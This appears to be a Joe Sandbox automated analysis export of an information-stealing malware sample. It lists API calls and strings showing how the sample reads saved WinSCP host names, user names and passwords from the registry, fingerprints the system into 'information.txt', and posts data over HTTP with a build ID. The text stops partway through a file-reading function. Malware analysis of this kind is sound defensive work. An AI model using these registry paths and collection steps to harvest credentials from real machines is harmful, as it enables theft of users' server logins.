Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0061F1B3
_memset.LIBCMT ref: 0061F1D3
_memset.LIBCMT ref: 0061F1E4
_memset.LIBCMT ref: 0061F1F5
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0061F229
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0061F25A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0061F272
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0061F299
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0061F2B9
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0061F2DC
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,006479CA), ref: 0061F375
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0061F3D5

Strings

Host: , xrefs: 0061F326
PortNumber, xrefs: 0061F3B9
Login: , xrefs: 0061F455
Password, xrefs: 0061F511
Security, xrefs: 0061F24F
Password: , xrefs: 0061F525
HostName, xrefs: 0061F363
UseMasterPassword, xrefs: 0061F24A
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0061F207
:22, xrefs: 0061F429
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0061F2AF
Soft: WinSCP, xrefs: 0061F2FA
UserName, xrefs: 0061F492
passwords.txt, xrefs: 0061F65E

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _memset$Value$CloseOpen$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 463713726-2798830873
Opcode ID: 999238d000665d1f061d26f09284955f83c0a20ce679b9cd02666f3b34363956
Instruction ID: 5cc4751a803e142b6273ea42e5d7b787a9b2a8d0b61cca0bacc24823068998d3
Opcode Fuzzy Hash: 999238d000665d1f061d26f09284955f83c0a20ce679b9cd02666f3b34363956
Instruction Fuzzy Hash: E6D1D67291012EEEDB60EB90EC92AD9B77AAF04304F0408E7A608B7151DA717FD5CF65

Function 00615E61 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 469
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A10
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A16
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A1C
Part of subcall function 006149DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00614A2E
Part of subcall function 006149DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00614A36

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00615F00
StrCmpCA.SHLWAPI(?), ref: 00615F1E
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006160B6
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 006160FA
lstrlenA.KERNEL32(?,",mode,00648AA0,------,00648A94,93e4f2dec1428009f8bc755e83a21d1b,",build_id,00648A7C,------,00648A70,",00648A64,------), ref: 00616529
lstrlenA.KERNEL32(?), ref: 00616538
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00616542
HeapAlloc.KERNEL32(00000000), ref: 00616549
lstrlenA.KERNEL32(?), ref: 00616556
_memmove.LIBCMT ref: 00616564
lstrlenA.KERNEL32(?), ref: 00616572
lstrlenA.KERNEL32(?,?,00000000), ref: 00616580
_memmove.LIBCMT ref: 0061658D
lstrlenA.KERNEL32(?,?,00000000), ref: 006165A2
HttpSendRequestA.WININET(?,?,00000000), ref: 006165B5
InternetReadFile.WININET(?,?,000000C7,?), ref: 00616616
InternetCloseHandle.WININET(?), ref: 00616626
InternetCloseHandle.WININET(?), ref: 00616632
InternetCloseHandle.WININET(?), ref: 00616644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0061612C

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Strings

build_id, xrefs: 00616345
------, xrefs: 00615FA8
------, xrefs: 00616132
", xrefs: 00616371
mode, xrefs: 006164A1
------, xrefs: 00616293
93e4f2dec1428009f8bc755e83a21d1b, xrefs: 0061639D
", xrefs: 006164CD
------, xrefs: 006163F5
", xrefs: 00616211

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$93e4f2dec1428009f8bc755e83a21d1b$build_id$mode
API String ID: 3702379033-2904037016
Opcode ID: 43422f8f8d22bd4a26cd9210fa9001ed9b26ca44936f7065d11ca29d45230d2c
Instruction ID: d516fa122589f00af91733b485ce878b1967b2e8b3753f7919bf9c9bd301fcf2
Opcode Fuzzy Hash: 43422f8f8d22bd4a26cd9210fa9001ed9b26ca44936f7065d11ca29d45230d2c
Instruction Fuzzy Hash: 5622A531D0057E9ACFA0EB65ED56BDCB77AAF04300F0188E6A60973121DA716FDA8F54

Function 006258C3 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 0062291C: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,0064761F,?,?,?), ref: 00622934
Part of subcall function 0062291C: HeapAlloc.KERNEL32(00000000), ref: 0062293B
Part of subcall function 0062291C: GetLocalTime.KERNEL32(?), ref: 00622947
Part of subcall function 0062291C: wsprintfA.USER32 ref: 00622972

Part of subcall function 00623230: _memset.LIBCMT ref: 00623263
Part of subcall function 00623230: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00623282
Part of subcall function 00623230: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 006232A7
Part of subcall function 00623230: RegCloseKey.ADVAPI32(?,?,?,?), ref: 006232B3
Part of subcall function 00623230: CharToOemA.USER32(?,?), ref: 006232C7

Part of subcall function 006232E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 006232FB
Part of subcall function 006232E0: _memset.LIBCMT ref: 0062332A
Part of subcall function 006232E0: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00623352
Part of subcall function 006232E0: lstrcatA.KERNEL32(?,00647E68,?,?,?,?,?), ref: 0062336F

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006225FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00622631
Part of subcall function 006225FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00622671
Part of subcall function 006225FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 006226C6
Part of subcall function 006225FE: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 006226CD

GetCurrentProcessId.KERNEL32(Path: ,006478BC,HWID: ,006478B0,GUID: ,006478A4,00000000,MachineID: ,00647894,00000000,Date: ,00647888,00647884,11.8,Version: ,0064761F), ref: 00625B18

Part of subcall function 00623EE1: OpenProcess.KERNEL32(00000410,00000000,'[b,00000000,?), ref: 00623F03
Part of subcall function 00623EE1: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00623F1E
Part of subcall function 00623EE1: CloseHandle.KERNEL32(00000000), ref: 00623F25

Part of subcall function 0062278C: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00625BD2,Windows: ,006478E0), ref: 006227A0
Part of subcall function 0062278C: HeapAlloc.KERNEL32(00000000,?,?,?,00625BD2,Windows: ,006478E0), ref: 006227A7

Part of subcall function 00623463: __EH_prolog3_catch_GS.LIBCMT ref: 0062346A
Part of subcall function 00623463: CoInitializeEx.OLE32(00000000,00000000,0000004C,00625C36,Install Date: ,006478F0,00000000,Windows: ,006478E0,Work Dir: In memory,006478C8), ref: 0062347B
Part of subcall function 00623463: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0062348C
Part of subcall function 00623463: CoCreateInstance.OLE32(00643F70,00000000,00000001,00643EA0,?), ref: 006234A6
Part of subcall function 00623463: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 006234DC
Part of subcall function 00623463: VariantInit.OLEAUT32(?), ref: 00623537

Part of subcall function 006235F3: __EH_prolog3_catch.LIBCMT ref: 006235FA
Part of subcall function 006235F3: CoInitializeEx.OLE32(00000000,00000000,00000030,00625CA4,?,AV: ,00647904,Install Date: ,006478F0,00000000,Windows: ,006478E0,Work Dir: In memory,006478C8), ref: 00623609
Part of subcall function 006235F3: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0062361A
Part of subcall function 006235F3: CoCreateInstance.OLE32(00643F70,00000000,00000001,00643EA0,?), ref: 00623634
Part of subcall function 006235F3: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0062366A
Part of subcall function 006235F3: VariantInit.OLEAUT32(?), ref: 006236B9

Part of subcall function 006228E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00611375), ref: 006228ED
Part of subcall function 006228E1: HeapAlloc.KERNEL32(00000000,?,?,?,00611375), ref: 006228F4
Part of subcall function 006228E1: GetComputerNameA.KERNEL32(00000000,00611375), ref: 00622908

Part of subcall function 006228AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006113A9), ref: 006228BB
Part of subcall function 006228AF: HeapAlloc.KERNEL32(00000000,?,?,?,006113A9), ref: 006228C2
Part of subcall function 006228AF: GetUserNameA.ADVAPI32(00000000,006113A9), ref: 006228D6

Part of subcall function 006231BF: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 006231D1
Part of subcall function 006231BF: GetDeviceCaps.GDI32(00000000,00000008), ref: 006231DC
Part of subcall function 006231BF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 006231E7
Part of subcall function 006231BF: ReleaseDC.USER32(00000000,00000000), ref: 006231F2
Part of subcall function 006231BF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00625DD5,?,Display Resolution: ,00647934,00000000,User Name: ,00647924,00000000,Computer Name: ,00647910,AV: ,00647904), ref: 006231FE
Part of subcall function 006231BF: HeapAlloc.KERNEL32(00000000,?,?,00625DD5,?,Display Resolution: ,00647934,00000000,User Name: ,00647924,00000000,Computer Name: ,00647910,AV: ,00647904,Install Date: ), ref: 00623205
Part of subcall function 006231BF: wsprintfA.USER32 ref: 00623217

Part of subcall function 00622A37: GetKeyboardLayoutList.USER32(00000000,00000000,00647812,?,?), ref: 00622A68
Part of subcall function 00622A37: LocalAlloc.KERNEL32(00000040,00000000), ref: 00622A76
Part of subcall function 00622A37: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00622A84
Part of subcall function 00622A37: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00622AB3
Part of subcall function 00622A37: LocalFree.KERNEL32(00000000), ref: 00622B5B

Part of subcall function 0062298A: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 006229A5
Part of subcall function 0062298A: HeapAlloc.KERNEL32(00000000), ref: 006229AC
Part of subcall function 0062298A: GetTimeZoneInformation.KERNEL32(?), ref: 006229BB
Part of subcall function 0062298A: wsprintfA.USER32 ref: 006229D9

Part of subcall function 00622BAD: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ,0064796C), ref: 00622BC1
Part of subcall function 00622BAD: HeapAlloc.KERNEL32(00000000,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ,0064796C,Keyboard Languages: ,00647950), ref: 00622BC8
Part of subcall function 00622BAD: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,006478C8,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ), ref: 00622BE6
Part of subcall function 00622BAD: RegQueryValueExA.KERNEL32(006478C8,00000000,00000000,00000000,000000FF,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000), ref: 00622C02
Part of subcall function 00622BAD: RegCloseKey.ADVAPI32(006478C8,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ,0064796C,Keyboard Languages: ,00647950), ref: 00622C0B

Part of subcall function 00622C63: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00622CD9
Part of subcall function 00622C63: wsprintfA.USER32 ref: 00622D37

Part of subcall function 00622C16: GetSystemInfo.KERNEL32(?), ref: 00622C30
Part of subcall function 00622C16: wsprintfA.USER32 ref: 00622C48

Part of subcall function 00622D75: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00647950,Display Resolution: ,00647934,00000000,User Name: ,00647924,00000000,Computer Name: ,00647910,AV: ,00647904,Install Date: ), ref: 00622D8D
Part of subcall function 00622D75: HeapAlloc.KERNEL32(00000000), ref: 00622D94
Part of subcall function 00622D75: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00622DB0
Part of subcall function 00622D75: wsprintfA.USER32 ref: 00622DD6

Part of subcall function 00623101: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00647817,?,?), ref: 00623130
Part of subcall function 00623101: Process32First.KERNEL32(00000000,00000128), ref: 00623140
Part of subcall function 00623101: Process32Next.KERNEL32(00000000,00000128), ref: 0062319E
Part of subcall function 00623101: CloseHandle.KERNEL32(00000000), ref: 006231A9

Part of subcall function 00622E5F: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00647816,00000000,?,?), ref: 00622ECF
Part of subcall function 00622E5F: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00622F0C
Part of subcall function 00622E5F: wsprintfA.USER32 ref: 00622F39
Part of subcall function 00622E5F: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00622F58
Part of subcall function 00622E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00622F8E
Part of subcall function 00622E5F: lstrlenA.KERNEL32(?), ref: 00622FA3

Part of subcall function 00622E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00647E28), ref: 00623038
Part of subcall function 00622E5F: RegCloseKey.ADVAPI32(?), ref: 006230A2
Part of subcall function 00622E5F: RegCloseKey.ADVAPI32(?), ref: 006230CE

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00647950,Display Resolution: ,00647934,00000000,User Name: ,00647924,00000000), ref: 006262A0

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

Strings

AV: , xrefs: 00625C7B
Cores: , xrefs: 00625FCB
Processor: , xrefs: 00625F6A
RAM: , xrefs: 0062608D
11.8, xrefs: 006258FC
information.txt, xrefs: 006262B0
Install Date: , xrefs: 00625C0E
HWID: , xrefs: 00625A8B
TimeZone: , xrefs: 00625EE9
Date: , xrefs: 0062595C
VideoCard: , xrefs: 006260F4
Computer Name: , xrefs: 00625CEA
Path: , xrefs: 00625AF8
Work Dir: In memory, xrefs: 00625B6D
Keyboard Languages: , xrefs: 00625E1B
GUID: , xrefs: 00625A1E
[Processes], xrefs: 00626167
MachineID: , xrefs: 006259BD
Threads: , xrefs: 0062602C
Version: , xrefs: 006258DC
Display Resolution: , xrefs: 00625DAC
Windows: , xrefs: 00625BAD
[Software], xrefs: 006261E0
Local Time: , xrefs: 00625E88
User Name: , xrefs: 00625D4B
[Hardware], xrefs: 00625F4A

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: 11.8$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 478979899-3952884412
Opcode ID: 8ee8cf20c1ff78648b938f0dfa364f91ed7d8719c0fb8e826c8c1b073dc8aaa3
Instruction ID: 7a10cea5478f2c9cf7cb677be23dd6882eb42efea20fa1e04c871d72c0352a19
Opcode Fuzzy Hash: 8ee8cf20c1ff78648b938f0dfa364f91ed7d8719c0fb8e826c8c1b073dc8aaa3
Instruction Fuzzy Hash: 8B527432D0442FAACF50FBA5EC529DDB77AAF00300F514569B61077166DB317FAA8B88

Function 00629E25 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00629E66
GetProcAddress.KERNEL32 ref: 00629E7D
GetProcAddress.KERNEL32 ref: 00629E94
GetProcAddress.KERNEL32 ref: 00629EAB
GetProcAddress.KERNEL32 ref: 00629EC2
GetProcAddress.KERNEL32 ref: 00629ED9
GetProcAddress.KERNEL32 ref: 00629EF0
GetProcAddress.KERNEL32 ref: 00629F07
GetProcAddress.KERNEL32 ref: 00629F1E
GetProcAddress.KERNEL32 ref: 00629F35
GetProcAddress.KERNEL32 ref: 00629F4C
GetProcAddress.KERNEL32 ref: 00629F63
GetProcAddress.KERNEL32 ref: 00629F7A
GetProcAddress.KERNEL32 ref: 00629F91
GetProcAddress.KERNEL32 ref: 00629FA8
GetProcAddress.KERNEL32 ref: 00629FBF
GetProcAddress.KERNEL32 ref: 00629FD6
GetProcAddress.KERNEL32 ref: 00629FED
GetProcAddress.KERNEL32 ref: 0062A004
GetProcAddress.KERNEL32 ref: 0062A01B
LoadLibraryA.KERNEL32(?,00629CA1), ref: 0062A02C
LoadLibraryA.KERNEL32(?,00629CA1), ref: 0062A03D
LoadLibraryA.KERNEL32(?,00629CA1), ref: 0062A04E
LoadLibraryA.KERNEL32(?,00629CA1), ref: 0062A05F
LoadLibraryA.KERNEL32(?,00629CA1), ref: 0062A070
GetProcAddress.KERNEL32(75070000,00629CA1), ref: 0062A08C
GetProcAddress.KERNEL32(75FD0000,00629CA1), ref: 0062A0A7
GetProcAddress.KERNEL32 ref: 0062A0BE
GetProcAddress.KERNEL32(75A50000,00629CA1), ref: 0062A0D9
GetProcAddress.KERNEL32(74E50000,00629CA1), ref: 0062A0F4
GetProcAddress.KERNEL32(76E80000,00629CA1), ref: 0062A10F
GetProcAddress.KERNEL32 ref: 0062A126

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 0ee0c3ddd51ecc7723cee168fc6b323042fab67e9c696b44122a5affb1a76509
Instruction ID: 3b0569c5dca1cbd1dae979137fbf70e3cbf2668a34cf6ac0e1d5165212770416
Opcode Fuzzy Hash: 0ee0c3ddd51ecc7723cee168fc6b323042fab67e9c696b44122a5affb1a76509
Instruction Fuzzy Hash: 8471FA79481B11EFDF0A9F61FE49A667BB2F70A3573004425EA5182270EF3E6860EF51

Function 00619777 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 195
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

CopyFileA.KERNEL32(?,?,00000001), ref: 0061981D
PathFileExistsA.SHLWAPI(?), ref: 00619828
Sleep.KERNEL32(000003E8), ref: 00619837
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0061989A
GetFileSize.KERNEL32(00000000,00000000), ref: 006198B0
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006198C7
HeapAlloc.KERNEL32(00000000), ref: 006198CE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006198E7
CloseHandle.KERNEL32(00000000), ref: 006198FF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0061990B
RtlAllocateHeap.NTDLL(00000000), ref: 00619912
